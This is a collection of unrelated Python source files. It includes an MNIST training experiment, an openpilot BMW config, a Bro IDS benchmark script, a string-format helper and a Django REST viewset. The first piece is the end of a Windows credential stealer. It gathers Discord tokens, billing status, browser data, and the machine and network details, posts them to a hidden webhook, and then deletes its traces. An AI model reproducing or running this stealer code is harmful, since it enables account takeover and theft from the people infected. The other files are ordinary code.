datas = self.__get_datas(token)
for data in datas:
content += f"\n{str(data)}"
content += f"\nbilling -> {self.__has_payment_methods(token)}"
else:
content = "No tokens found!\n"
return content
except:
pass
def __get_browser_data(self):
try:
self.__browser._main()
for file in self.__files:
request_post(self.__rharha, file)
except:
pass
def main(self):
try:
if os.name != "nt":
exit(1)
receiver = Receiver()
threading.Thread(target=self.__get_browser_data).start()
tokens = self.__get_tokens()
verfied_tokens = self.__check_tokens(tokens)
recreated_tokens = self.__recreate_tokens(verfied_tokens)
content = self.__format_data(recreated_tokens)
payload = {
"embeds": [
{
"title": "Discord Informations:",
"description": f"```{content}\n```",
"color": 0
},
{
"title": "Computer Informations:",
"description": f"```Compter Name -> {os.getenv('COMPUTERNAME')}\n"
+ f"Username -> {os.getenv('USERNAME')}```",
"color": 0
},
{
"title": "Network Informations",
"description": f"```Ip -> {receiver._get_ip()}\n"
+ f"Location -> {receiver._get_location()}\n"
+ f"Country -> {receiver._get_country()}\n"
+ f"Region -> {receiver._get_region()}\n"
+ f"ISP -> {receiver._get_isp()}```",
"color": 0
}
]
}
requests.post(self.__rharha, json=payload)
shutil.rmtree(temp_folder)
except:
pass
try:
threading.Thread(target=Setup().main).start()
except:
pass
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 01/24/22 10:38 PM
# @Author : Fabrice Harel-Canada
# @File : mnist.py
import os
from typing import Optional
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import torch
from torch.nn import functional as F
from torch import nn
from pytorch_lightning.core.lightning import LightningModule
from torch.optim import Adam
import torchmetrics
from torch.utils.data import DataLoader, random_split
from torchvision.datasets import MNIST
from torchvision import datasets, transforms
from pytorch_lightning import Trainer, LightningDataModule
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
def unstable_softmax(logits):
"""Computes softmax in a numerically unstable way."""
exp = torch.exp(logits)
sm = exp / torch.sum(exp)
return sm
def unstable_cross_entropy(probs, labels):
"""Computes cross entropy in a numerically unstable way."""
return -torch.sum(torch.log(probs) * labels)
def stable_cross_entropy(probs, labels, reduction='mean'):
    batchloss = -torch.sum(labels.squeeze() * torch.log(probs), dim=1)
if reduction == 'none':
return batchloss
elif reduction == 'mean':
return torch.mean(batchloss)
elif reduction == 'sum':
return torch.sum(batchloss)
else:
raise NotImplementedError('Unsupported reduction mode.')
class StableModel(LightningModule):
def __init__(self, num_classes: int = 10):
super().__init__()
self.num_classes = num_classes
# mnist images are (1, 28, 28) (channels, height, width)
self.layer_1 = nn.Linear(28 * 28, 128)
self.layer_2 = nn.Linear(128, 256)
self.layer_3 = nn.Linear(256, self.num_classes)
# metrics
self.accuracy = torchmetrics.Accuracy()
self.accuracy.mode = "multi-label"
def forward(self, x):
batch_size, channels, height, width = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = F.relu(x)
x = self.layer_2(x)
x = F.relu(x)
x = self.layer_3(x)
x = F.softmax(x, dim=1)
return x
def training_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
# log step metric
loss = stable_cross_entropy(probs, y)
self.accuracy(probs, y)
self.log('train_acc_step', self.accuracy)
return loss
def training_epoch_end(self, outs):
# log epoch metric
self.log('train_acc_epoch', self.accuracy)
def validation_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
# log step metric
loss = stable_cross_entropy(probs, y)
self.log("val_loss", loss)
self.accuracy(probs, y)
self.log('val_acc_step', self.accuracy)
return loss
def test_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
# log step metric
loss = stable_cross_entropy(probs, y)
self.log("test_loss", loss)
self.accuracy(probs, y)
self.log('test_acc', self.accuracy)
def configure_optimizers(self):
return Adam(self.parameters(), lr=1e-3)
def predict(self, x):
out = self(x)
if torch.isnan(out).any():
raise ValueError("Model prediction contains NaN.")
return torch.argmax(out)
class UnstableSMModel(StableModel):
def forward(self, x):
batch_size, channels, height, width = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = F.relu(x)
x = self.layer_2(x)
x = F.relu(x)
x = self.layer_3(x)
x = unstable_softmax(x)
return x
class UnstableCEModel(StableModel):
def training_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
loss = unstable_cross_entropy(probs, y)
return loss
class UnstableSMCEModel(StableModel):
def forward(self, x):
batch_size, channels, height, width = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = F.relu(x)
x = self.layer_2(x)
x = F.relu(x)
x = self.layer_3(x)
x = unstable_softmax(x)
return x
def training_step(self, batch, batch_idx):
x, y = batch
probs = self(x)
loss = unstable_cross_entropy(probs, y)
return loss
class MNISTDataModule(LightningDataModule):
def __init__(self,
data_dir: Optional[str] = './data/',
batch_size: int = 32):
super().__init__()
self.data_dir = data_dir
self.batch_size = batch_size
self.transforms = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
self.target_transforms = transforms.Compose([
lambda x:torch.LongTensor([x]),
lambda x:F.one_hot(x, 10).squeeze()
])
self.setup()
def setup(self, stage: Optional[str] = None):
if stage == "fit" or stage is None:
mnist_full = MNIST(self.data_dir,
train=True,
transform=self.transforms,
target_transform=self.target_transforms)
self.mnist_train, self.mnist_val = random_split(mnist_full, [55000, 5000])
if stage == "test" or stage is None:
self.mnist_test = MNIST(self.data_dir,
train=False,
transform=self.transforms,
target_transform=self.target_transforms)
def train_dataloader(self):
return DataLoader(self.mnist_train, batch_size=self.batch_size)
def val_dataloader(self):
return DataLoader(self.mnist_val, batch_size=self.batch_size)
def test_dataloader(self):
return DataLoader(self.mnist_test, batch_size=self.batch_size)
def load_models():
sm = StableModel()
usmm = UnstableSMModel()
ucem = UnstableCEModel()
usmcem = UnstableSMCEModel()
models = [sm, usmm, ucem, usmcem]
return_models = []
for model in models:
model_name = model.__class__.__name__
model_save_path = os.path.join('./pretrained/', model_name + '.pth')
if os.path.exists(model_save_path):
print("Loading pretrained %s model!" % (model_name))
model.load_state_dict(torch.load(model_save_path))
model.eval()
else:
raise FileNotFoundError(
"A pretrained %s model was not found \
- run `python mnist.py` to generate!" % (model_name)
)
return_models.append(model)
return return_models
if __name__ == '__main__':
sm = StableModel()
usmm = UnstableSMModel()
ucem = UnstableCEModel()
usmcem = UnstableSMCEModel()
models = [sm, usmm, ucem, usmcem]
mnist_dm = MNISTDataModule()
escb = EarlyStopping(monitor="train_acc_epoch", mode="max", patience=3)
results = []
for model in models:
model_name = model.__class__.__name__
model_save_path = os.path.join('./pretrained/', model_name + '.pth')
if os.path.exists(model_save_path):
print("Loading pretrained %s model!" % (model_name))
model.load_state_dict(torch.load(model_save_path))
model.eval()
else:
# train
print("Training a new %s model!" % (model_name))
trainer = Trainer(max_epochs=10, callbacks=[escb])
trainer.fit(model, datamodule=mnist_dm)
# save model
os.makedirs(os.path.dirname(model_save_path), exist_ok=True)
torch.save(model.state_dict(), model_save_path)
model.eval()
trainer = Trainer(max_epochs=10, callbacks=[escb])
out = trainer.test(model, datamodule=mnist_dm)
out[0]['model'] = model
out[0]['model_name'] = model_name
results.extend(out)
import requests
from PIL import Image
import cv2
# image of a 2
url = 'https://www.researchgate.net/profile/Jose_Sempere/publication/221258631/figure/fig1/AS:305526891139075@1449854695342/Handwritten-digit-2.png'
response = requests.get(url, stream=True)
img = Image.open(response.raw)
img.show()
img_array = np.asarray(img)
resized = cv2.resize(img_array, (28, 28))
gray_scale = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY) # (28, 28)
image = cv2.bitwise_not(gray_scale)
image = image / 255
image = image.reshape(1, 28, 28)
image = torch.from_numpy(image).float().unsqueeze(0)
for result in results:
print(result['model'].predict(image))
|
from selfdrive.car import dbc_dict
# Steer torque limits
class SteerLimitParams: #controls running @ 100hz
STEER_MAX = 9
STEER_DELTA_UP = 10 / 100 # 10Nm/s
STEER_DELTA_DOWN = 1000 / 100 # 10Nm/sample - no limit
STEER_ERROR_MAX = 999 # max delta between torque cmd and torque motor
class SteerActuatorParams: # stepper parameters
MAX_STEERING_TQ = 8 # Nm
    # TODO: remove this if not used - since it is included in the DBC factor
# ACTUATOR_RATIO = 25 / 12 * (13+212/289) # big cog / small cog * planetary gearbox
# POSITION_SCALING = 256 / 1.8 # microsteps / base step angle [deg]
CENTERING_COEFF = 0.0005
    ZERO_ANGLE_HOLD_TQ = 1  # car controller will interpolate between the zero-angle torque and the start of the linear region
    STEER_LINEAR_REGION = 5  # deg, start of the linear region for small angles
    STEER_TORQUE_OFFSET = 3  # additive torque offset
STEER_BACKLASH = 1 #deg
#car chimes: enumeration from dbc file. Chimes are for alerts and warnings
class CM:
MUTE = 0
SINGLE = 3
DOUBLE = 4
REPEATED = 1
CONTINUOUS = 2
# car beeps: enumeration from dbc file. Beeps are for activation and deactivation
class BP:
MUTE = 0
SINGLE = 3
TRIPLE = 2
REPEATED = 1
class AH:
#[alert_idx, value]
    # See dbc files for info on values
NONE = [0, 0]
FCW = [1, 1]
STEER = [2, 1]
BRAKE_PRESSED = [3, 10]
GEAR_NOT_D = [4, 6]
SEATBELT = [5, 5]
SPEED_TOO_HIGH = [6, 8]
class CAR:
E82_DCC = "BMW E82 with Dynamic Cruise Control VO544 coded in"
E90_DCC = "BMW E90 with Dynamic Cruise Control VO544"
E82 = "BMW E82 with normal Cruise Control VO540"
E90 = "BMW E82 with normal Cruise Control VO540"
BMW_Eseries = {
128: 5, 201: 8, 205: 8, 206: 8, 209: 8, 212: 8, 304: 5, 320: 2, 404: 4, 470: 2, 678: 2, 884: 5, #F-CAN
128: 5, 168: 8, 169: 8, 170: 8, 172: 8, 180: 8, 182: 5, 184: 8, 186: 8, 191: 5, 196: 7, 200: 6, 201: 8, 205: 8, 206: 8, 209: 8, 212: 8, 266: 6, 304: 5, 309: 2, 373: 3, 404: 4, 408: 5, 414: 8, 416: 8, 418: 8, 422: 8, 436: 8, 437: 7, 438: 7, 464: 8, 466: 6, 470: 2, 481: 6, 502: 2, 514: 2, 538: 3, 550: 5, 570: 4, 578: 5, 594: 2, 678: 2, 690: 8, 691: 5, 704: 3, 719: 2, 722: 3, 753: 3, 758: 2, 760: 8, 762: 5, 764: 7, 784: 7, 785: 2, 797: 2, 816: 8, 818: 2, 821: 8, 823: 2, 847: 2, 884: 5, 893: 2, 896: 7, 897: 2, 899: 4, 904: 7, 940: 2, 945: 6, 947: 6, 948: 8, 953: 3, 958: 2, 1007: 3, 1152: 8, 1170: 8, 1175: 8, 1176: 8, 1193: 8, 1246: 8, 1408: 8, 1426: 8, 1432: 8, 1449: 8, 1472: 8, 1494: 8, 1504: 8, 1506: 8, 1517: 8, 1522: 8, 1528: 8 #PT-CAN
}
FINGERPRINTS = {
CAR.E82_DCC: [{**BMW_Eseries, **{403: 8}}], #add DynamicCruiseControlStatus message for VO544 option
CAR.E82: [{**BMW_Eseries, **{512: 8}}], #add CruiseControlStatus message for VO540 option
}
DBC = {
CAR.E82_DCC: dbc_dict('bmw_e9x_e8x', 'toyota_adas'), #'toyota_adas' for potentially retrofitted radar
CAR.E90_DCC: dbc_dict('bmw_e9x_e8x', 'toyota_adas'),
CAR.E82: dbc_dict('bmw_e9x_e8x', 'toyota_adas'),
CAR.E90: dbc_dict('bmw_e9x_e8x', 'toyota_adas')
}
STEER_THRESHOLD = 100  # retrofitted actuator
NO_DSU_CAR = [CAR.E82_DCC, CAR.E90_DCC, CAR.E82, CAR.E90] #Indicate which cars don't have radar installed
TSS2_CAR = []
|
#!/usr/bin/env python
import sys
import imp
import os
import subprocess
from datetime import datetime
import csv
import tempfile
def main():
if len(sys.argv) != 2:
print 'Usage: ./broeval.py <configfile>'
return
(cfgpath, cfgname) = os.path.split(sys.argv[1])
(cfgname, cfgext) = os.path.splitext(cfgname)
(cfgfile, cfgfilename, cfgdata) = imp.find_module(cfgname, [cfgpath])
config = imp.load_module(cfgname, cfgfile, cfgfilename, cfgdata)
sources = map(lambda (i, s): (s, config.SOURCE_BRO[i]), enumerate(config.SOURCE))
targets = map(lambda (i, s): (s, config.TARGET_BRO[i]), enumerate(config.TARGET))
print 'Welcome to broeval.py'
print ''
print 'Config: %s' % sys.argv[1]
for src, srcb in sources:
print 'Source: %s (with Bro %s)' % (src, 'ENABLED' if srcb else 'DISABLED')
for tgt, tgtb in targets:
print 'Target: %s (with Bro %s)' % (tgt, 'ENABLED' if tgtb else 'DISABLED')
print "C'Mode: %s" % config.MODE
print 'Epochs: %i' % config.EPOCHS
print "Iter's: %i" % config.ITER
print 'Size : 10^%i bytes' % config.SIZE
print 'Result: %s' % config.OUTFILE
print ''
# 1. Reset the environment (terminate Bro if still running)
for src, srcb in sources:
print 'Terminating Bro on source machine %s' % src
print os.popen('./helpers/brokill.sh %s' % src).read()
for tgt, tgtb in targets:
print 'Terminating Bro on target machine %s' % tgt
print os.popen('./helpers/brokill.sh %s' % tgt).read()
csvfile = open(config.OUTFILE, 'wb')
csvwriter = csv.writer(csvfile)
csvwriter.writerow(['SOURCE', 'SOURCE_BRO', 'TARGET', 'TARGET_BRO', 'MODE', 'EPOCHS', 'ITER', 'SIZE', 'seconds', 'sourcecpu', 'sourcemem', 'targetcpu', 'targetmem'])
# 2. Start Bro (if requested)
for src, srcb in sources:
if srcb:
print 'Starting Bro on source machine %s' % src
print os.popen('./helpers/brostart.sh %s' % src).read()
for tgt, tgtb in targets:
if tgtb:
print 'Starting Bro on target machine %s' % tgt
print os.popen('./helpers/brostart.sh %s' % tgt).read()
for epoch in range(config.EPOCHS):
print '---- %s - EPOCH %i - %s ----' % (sys.argv[1], epoch, datetime.now().time())
sourcestat = [None] * len(sources)
targetstat = [None] * len(targets)
# If Bro is enabled, start collecting CPU / mem statistics
for i, (src, srcb) in enumerate(sources):
if srcb:
sourcestat[i] = subprocess.Popen(['./helpers/brostat.sh', src], stdout=subprocess.PIPE)
for i, (tgt, tgtb) in enumerate(targets):
if tgtb:
targetstat[i] = subprocess.Popen(['./helpers/brostat.sh', tgt], stdout=subprocess.PIPE)
# Run the data transfer
processes = []
tempfiles = []
seconds = []
for i, (src, srcb) in enumerate(sources):
processes.append([])
tempfiles.append([])
seconds.append([])
for j, (tgt, tgtb) in enumerate(targets):
processes[i].append(None)
tempfiles[i].append(None)
seconds[i].append(.0)
filed, filename = tempfile.mkstemp()
tempfiles[i][j] = [os.fdopen(filed), filename]
processes[i][j] = subprocess.Popen(['./helpers/%s.sh' % config.MODE, src, tgt, str(config.ITER), str(config.SIZE)], stdout=subprocess.PIPE, stderr=tempfiles[i][j][0])
for i, (src, srcb) in enumerate(sources):
for j, (tgt, tgtb) in enumerate(targets):
processes[i][j].wait()
tempfiles[i][j][0].close()
tempfiles[i][j][0] = open(tempfiles[i][j][1], 'r')
seconds[i][j] = float(tempfiles[i][j][0].readlines()[-1].strip())
tempfiles[i][j][0].close()
os.remove(tempfiles[i][j][1])
print 'source %s, target %s: %.2f seconds.' % (src, tgt, seconds[i][j])
# If Bro is enabled, stop collecting CPU / mem statistics
sourcecpu = [.0] * len(sources)
sourcemem = [.0] * len(sources)
targetcpu = [.0] * len(targets)
targetmem = [.0] * len(targets)
for i, (src, srcb) in enumerate(sources):
if srcb:
sourcestat[i].kill()
outs, errs = sourcestat[i].communicate()
lines = outs.split('\n')
linecount = 0
for line in lines:
if line and line.split()[0] != '%CPU':
linecount += 1
sourcecpu[i] += float(line.split()[0].replace(',', '.'))
sourcemem[i] += float(line.split()[1])
sourcecpu[i] /= linecount
sourcemem[i] /= linecount
print 'Bro @ source %s took on average %.2f%% CPU and %.0f KB of physical memory.' % (src, sourcecpu[i], sourcemem[i])
for i, (tgt, tgtb) in enumerate(targets):
if tgtb:
targetstat[i].kill()
outs, errs = targetstat[i].communicate()
lines = outs.split('\n')
linecount = 0
for line in lines:
if line and line.split()[0] != '%CPU':
linecount += 1
targetcpu[i] += float(line.split()[0].replace(',', '.'))
targetmem[i] += float(line.split()[1])
targetcpu[i] /= linecount
targetmem[i] /= linecount
print 'Bro @ target %s took on average %.2f%% CPU and %.0f KB of physical memory.' % (tgt, targetcpu[i], targetmem[i])
for i, (src, srcb) in enumerate(sources):
for j, (tgt, tgtb) in enumerate(targets):
csvwriter.writerow([src, srcb, tgt, tgtb, config.MODE, config.EPOCHS, config.ITER, config.SIZE, seconds[i][j], sourcecpu[i], sourcemem[i], targetcpu[j], targetmem[j]])
print '\n'
# Terminate Bro
csvfile.close()
for src, srcb in sources:
if srcb:
print 'Terminating Bro on source machine %s' % src
print os.popen('./helpers/brokill.sh %s' % src).read()
for tgt, tgtb in targets:
if tgtb:
print 'Terminating Bro on target machine %s' % tgt
print os.popen('./helpers/brokill.sh %s' % tgt).read()
if __name__ == '__main__':
main()
|
def str_format(s, *args, **kwargs):
"""Return a formatted version of S, using substitutions from args and kwargs.
(Roughly matches the functionality of str.format but ensures compatibility with Python 2.5)
"""
args = list(args)
x = 0
while x < len(s):
# Skip non-start token characters
if s[x] != '{':
x += 1
continue
end_pos = s.find('}', x)
# If end character can't be found, move to next character
if end_pos == -1:
x += 1
continue
name = s[x + 1:end_pos]
# Ensure token name is alpha numeric
if not name.isalnum():
x += 1
continue
# Try find value for token
value = args.pop(0) if args else kwargs.get(name)
if value:
value = str(value)
# Replace token with value
s = s[:x] + value + s[end_pos + 1:]
# Update current position
x = x + len(value) - 1
x += 1
return s
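# --- Hedged usage examples (added for illustration; not part of the original function) ---
if __name__ == '__main__':
    print(str_format("Hello {name}", name="World"))  # Hello World
    print(str_format("{0} + {1} = {2}", 1, 2, 3))     # 1 + 2 = 3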
|
# coding: utf-8
import ast
from datetime import timedelta
from django.core.exceptions import EmptyResultSet, FieldDoesNotExist
from django.db import ProgrammingError
from django.db.models import functions
from django.db.models.query import F, Prefetch, QuerySet
from django.utils.timezone import now
from rest_framework import serializers, viewsets
from rest_framework.exceptions import ValidationError
from rest_framework.schemas import AutoSchema
from common.api.fields import ChoiceDisplayField, ReadOnlyObjectField
from common.api.utils import AGGREGATES, CASTS, FUNCTIONS, RESERVED_QUERY_PARAMS, parse_filters, url_value
from common.models import Entity, MetaData
from common.settings import settings
from common.utils import get_field_by_path, get_pk_field, str_to_bool
class CommonModelViewSet(viewsets.ModelViewSet):
"""
    Common ModelViewSet definition for the REST API
"""
url_params = {}
schema = AutoSchema()
def get_serializer_class(self):
        # The default serializer is used for update/delete operations
default_serializer = getattr(self, "default_serializer", None)
if default_serializer and self.action not in ("list", "retrieve", "update", "partial_update"):
return default_serializer
        # The serializer can be substituted depending on the API call parameters
query_params = getattr(self.request, "query_params", None)
url_params = self.url_params or (query_params.dict() if query_params else {})
if default_serializer:
            # Utility function to add a field to the serializer
def add_field_to_serializer(fields, field_name):
if not field_name:
return
field_name = field_name.strip()
source = field_name.replace(".", "__")
                # Specific field for enumerations
choices = getattr(get_field_by_path(self.queryset.model, field_name), "flatchoices", None)
if choices and str_to_bool(url_params.get("display")):
fields[field_name + "_display"] = ChoiceDisplayField(choices=choices, source=source)
                # Specific field for displaying the value
fields[field_name] = ReadOnlyObjectField(source=source if "." in field_name else None)
            # Add annotation fields to the serializer
annotations = {}
for annotation in FUNCTIONS.keys():
for field in url_params.get(annotation, "").split(","):
if not field:
continue
field_name = annotation + "__" + field.strip()
field_name, *args = field_name.split("|")
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, cast = field_name.split(":")
source = field_name.replace(".", "__") if "." in field else None
annotations[field_name] = serializers.ReadOnlyField(source=source)
            # Add aggregation fields to the serializer
aggregations = {}
for aggregate in AGGREGATES.keys():
for field in url_params.get(aggregate, "").split(","):
if not field:
continue
field_name = aggregate + "__" + field.strip()
field_name, *args = field_name.split("|")
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, cast = field_name.split(":")
source = field_name.replace(".", "__") if "." in field else None
aggregations[field_name] = serializers.ReadOnlyField(source=source)
            # Add the groupings to the serializer
if "group_by" in url_params or aggregations:
fields = {}
for field in url_params.get("group_by", "").split(","):
add_field_to_serializer(fields, field)
fields.update(aggregations)
                # A serializer with the grouped data is created on the fly
return type(default_serializer.__name__, (serializers.Serializer,), fields)
            # Add the field restriction to the serializer
elif "fields" in url_params:
fields = {}
for field in url_params.get("fields").split(","):
add_field_to_serializer(fields, field)
                # A serializer with restricted fields is created on the fly
return type(default_serializer.__name__, (serializers.Serializer,), fields)
            # Use the simplified serializer
elif str_to_bool(url_params.get("simple")):
serializer = getattr(self, "simple_serializer", default_serializer)
serializer._declared_fields.update(annotations)
return serializer
            # Use the default serializer for updates, without altering the data
elif self.action in ("update", "partial_update"):
return default_serializer
            # Add the annotations to the default serializer
elif not aggregations and annotations:
serializer = super().get_serializer_class()
serializer._declared_fields.update(annotations)
return serializer
return super().get_serializer_class()
def perform_create(self, serializer):
if issubclass(serializer.Meta.model, Entity):
return serializer.save(_current_user=self.request.user)
return super().perform_create(serializer)
def perform_update(self, serializer):
if issubclass(serializer.Meta.model, Entity):
return serializer.save(_current_user=self.request.user)
return super().perform_update(serializer)
def perform_destroy(self, instance):
if isinstance(instance, Entity):
return instance.delete(_current_user=self.request.user)
return super().perform_destroy(instance)
def list(self, request, *args, **kwargs):
        # Special handling for aggregations without group_by or when the result is not a QuerySet
queryset = self.get_queryset()
if not isinstance(queryset, QuerySet):
from rest_framework.response import Response
return Response(queryset)
try:
return super().list(request, *args, **kwargs)
except (AttributeError, FieldDoesNotExist) as error:
self.queryset_error = error
raise ValidationError(dict(error="fields: {}".format(error)), code="fields")
def paginate_queryset(self, queryset):
        # No pagination when all results are requested or when the result is not a QuerySet
if not isinstance(queryset, QuerySet) or str_to_bool(self.request.query_params.get("all", None)):
return None
try:
return super().paginate_queryset(queryset)
except ProgrammingError as error:
raise ValidationError(dict(error="page: {}".format(error)), code="page")
def get_queryset(self):
        # Avoid re-evaluating the QuerySet after an error
if getattr(self, "queryset_error", False):
return
try:
            # Special handling for aggregations without group_by or when the result is not a QuerySet
queryset = super().get_queryset()
if not isinstance(queryset, QuerySet):
return queryset
options = dict(aggregates=None, annotates=None, distinct=None, filters=None, order_by=None)
self.url_params = url_params = self.request.query_params.dict()
            # Reserved keywords in URLs
default_reserved_query_params = ["format"] + (
[self.paginator.page_query_param, self.paginator.page_size_query_param] if self.paginator else []
)
reserved_query_params = default_reserved_query_params + RESERVED_QUERY_PARAMS
            # Search criteria stored in the cache
cache_key = url_params.pop("cache", None)
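            # Passing ?cache=<key> stores the remaining query parameters under
            # settings.API_CACHE_PREFIX + <key> (for settings.API_CACHE_TIMEOUT seconds
            # by default, overridable with ?timeout=<seconds>) so the same query can be
            # replayed later with only the cache key.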
if cache_key:
from django.core.cache import cache
cache_params = cache.get(settings.API_CACHE_PREFIX + cache_key, {})
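                # Merge the cached parameters with the current ones; parameters given
                # explicitly in the URL take precedence over the cached values.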
new_url_params = {}
new_url_params.update(**cache_params)
new_url_params.update(**url_params)
self.url_params = url_params = new_url_params
new_cache_params = {
key: value for key, value in url_params.items() if key not in default_reserved_query_params
}
if new_cache_params:
cache_timeout = int(url_params.pop("timeout", settings.API_CACHE_TIMEOUT)) or None
cache.set(settings.API_CACHE_PREFIX + cache_key, new_cache_params, timeout=cache_timeout)
options["cache_expires"] = now() + timedelta(seconds=cache_timeout) if cache_timeout else "never"
cache_url = "{}?cache={}".format(self.request.build_absolute_uri(self.request.path), cache_key)
plain_url = cache_url
for key, value in url_params.items():
url_param = "&{}={}".format(key, value)
if key in default_reserved_query_params:
cache_url += url_param
plain_url += url_param
options["cache_data"] = new_cache_params
options["cache_url"] = cache_url
options["raw_url"] = plain_url
            # Silent errors
silent = str_to_bool(url_params.get("silent", ""))
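            # With ?silent=true, filtering/annotation/aggregation/ordering/distinct
            # errors are swallowed instead of raising a ValidationError; the failure is
            # flagged in the options and the error message is included when settings.DEBUG is set.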
            # Filters (wrapped in a function so aggregations without group_by can call it)
def do_filter(queryset):
try:
filters, excludes = {}, {}
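                    # Filter syntax: a key prefixed with "-" excludes, "+" (or no prefix)
                    # filters; a value wrapped in [brackets] is resolved as an F()
                    # reference to another field.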
for key, value in url_params.items():
key = key.replace(".", "__")
if value.startswith("[") and value.endswith("]"):
value = F(value[1:-1].replace(".", "__"))
if key in reserved_query_params:
continue
if key.startswith("-"):
key = key[1:].strip()
excludes[key] = url_value(key, value)
else:
key = key[1:].strip() if key.startswith("+") else key.strip()
filters[key] = url_value(key, value)
if filters:
queryset = queryset.filter(**filters)
if excludes:
queryset = queryset.exclude(**excludes)
                    # Generic filters
others = url_params.get("filters", "")
if others:
queryset = queryset.filter(parse_filters(others))
if filters or others:
options["filters"] = True
except Exception as error:
if not silent:
raise ValidationError(dict(error="filters: {}".format(error)), code="filters")
options["filters"] = False
if settings.DEBUG:
options["filters_error"] = str(error)
return queryset
# Annotations
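            # Annotation syntax (a sketch; the exact function and cast names come from
            # FUNCTIONS and CASTS in common.api.utils):
            #   ?<function>=<field>[:<cast>][|<extra_arg>[:<cast>]...],<other_field>...
            # Each annotated value is exposed as "<function>__<field>".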
annotations = {}
try:
for annotation, function in FUNCTIONS.items():
for field_name in url_params.get(annotation, "").split(","):
if not field_name:
continue
field_name, *args = field_name.split("|")
function_args = []
for arg in args:
try:
function_args.append(ast.literal_eval(arg))
except (SyntaxError, ValueError):
arg = arg.replace(".", "__")
if any(arg.endswith(":{}".format(cast)) for cast in CASTS):
arg, *junk, cast = arg.split(":")
cast = CASTS.get(cast.lower())
arg = functions.Cast(arg, output_field=cast()) if cast else arg
function_args.append(arg)
field_name = field_name.replace(".", "__")
field = field_name
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, *junk, cast = field_name.split(":")
cast = CASTS.get(cast.lower())
field = functions.Cast(field_name, output_field=cast()) if cast else field_name
annotations[annotation + "__" + field_name] = function(field, *function_args)
if annotations:
queryset = queryset.annotate(**annotations)
options["annotates"] = True
except Exception as error:
if not silent:
raise ValidationError(dict(error="annotates: {}".format(error)), code="annotates")
options["annotates"] = False
if settings.DEBUG:
options["annotates_error"] = str(error)
# Aggregations
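            # Aggregation keys work like annotations but go through AGGREGATES; a leading
            # "+" (received as a space once URL-decoded) requests a DISTINCT aggregate.
            # Without group_by the queryset is collapsed with .aggregate() and a plain
            # dict is returned, which is why list() bypasses pagination in that case.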
aggregations = {}
if self.action == "list":
try:
for aggregate, function in AGGREGATES.items():
for field_name in url_params.get(aggregate, "").split(","):
if not field_name:
continue
distinct = field_name.startswith(" ") or field_name.startswith("+")
field_name = field_name[1:] if distinct else field_name
field_name = field_name.strip().replace(".", "__")
value = field_name
if any(field_name.endswith(":{}".format(cast)) for cast in CASTS):
field_name, *junk, cast = field_name.split(":")
cast = CASTS.get(cast.lower())
value = functions.Cast(field_name, output_field=cast()) if cast else value
aggregations[aggregate + "__" + field_name] = function(value, distinct=distinct)
group_by = url_params.get("group_by", "")
if group_by:
_queryset = queryset.values(*group_by.replace(".", "__").split(","))
if aggregations:
_queryset = _queryset.annotate(**aggregations)
else:
_queryset = _queryset.distinct()
queryset = _queryset
options["aggregates"] = True
elif aggregations:
options["aggregates"] = True
                        queryset = do_filter(queryset)  # Apply any filters
return queryset.aggregate(**aggregations)
except ValidationError:
raise
except Exception as error:
if not silent:
raise ValidationError(dict(error="aggregates: {}".format(error)), code="aggregates")
options["aggregates"] = False
if settings.DEBUG:
options["aggregates_error"] = str(error)
            # Filters
queryset = do_filter(queryset)
            # Ordering
orders = []
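            # Ordering syntax: "-field" for descending, "+field" (or "field") for
            # ascending; a trailing "<" puts NULLs first and ">" puts NULLs last.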
try:
order_by = url_params.get("order_by", "")
if order_by:
for order in order_by.replace(".", "__").split(","):
nulls_first, nulls_last = order.endswith("<"), order.endswith(">")
order = order[:-1] if nulls_first or nulls_last else order
if order.startswith("-"):
orders.append(F(order[1:]).desc(nulls_first=nulls_first, nulls_last=nulls_last))
else:
order = order[1:] if order.startswith("+") or order.startswith(" ") else order
orders.append(F(order).asc(nulls_first=nulls_first, nulls_last=nulls_last))
temp_queryset = queryset.order_by(*orders)
                str(temp_queryset.query)  # Force SQL compilation to surface any error early
queryset = temp_queryset
options["order_by"] = True
except EmptyResultSet:
pass
except Exception as error:
if not silent:
raise ValidationError(dict(error="order_by: {}".format(error)), code="order_by")
options["order_by"] = False
if settings.DEBUG:
options["order_by_error"] = str(error)
# Distinct
distincts = []
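            # ?distinct=<field1>,<field2> relies on DISTINCT ON and therefore only works
            # on PostgreSQL; a plain boolean value (e.g. ?distinct=true) falls back to a
            # simple DISTINCT on the whole row.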
try:
distinct = url_params.get("distinct", "")
if distinct:
distincts = distinct.replace(".", "__").split(",")
if str_to_bool(distinct) is not None:
distincts = []
queryset = queryset.distinct(*distincts)
options["distinct"] = True
except EmptyResultSet:
pass
except Exception as error:
if not silent:
raise ValidationError(dict(error="distinct: {}".format(error)), code="distinct")
options["distinct"] = False
if settings.DEBUG:
options["distinct_error"] = str(error)
            # Simplified query and/or extraction of specific fields
fields = url_params.get("fields", "")
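            # When either option is used the queryset returns plain dicts through
            # .values() and eager loading is reset, re-adding select_related() only for
            # the relations actually referenced by the requested fields.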
if str_to_bool(url_params.get("simple", "")) or fields:
                # Drop eager loading of related objects
if queryset.query.select_related:
queryset = queryset.select_related(None).prefetch_related(None)
                # Specific fields
try:
relateds = set()
field_names = set()
for field in fields.replace(".", "__").split(","):
if not field:
continue
field_names.add(field)
*related, field_name = field.split("__")
if related and field not in annotations:
relateds.add("__".join(related))
if relateds:
queryset = queryset.select_related(*relateds)
if field_names:
queryset = queryset.values(*field_names)
except Exception as error:
if not silent:
raise ValidationError(dict(error="fields: {}".format(error)), code="fields")
else:
                # Metadata retrieval
metadata = str_to_bool(url_params.get("meta", ""))
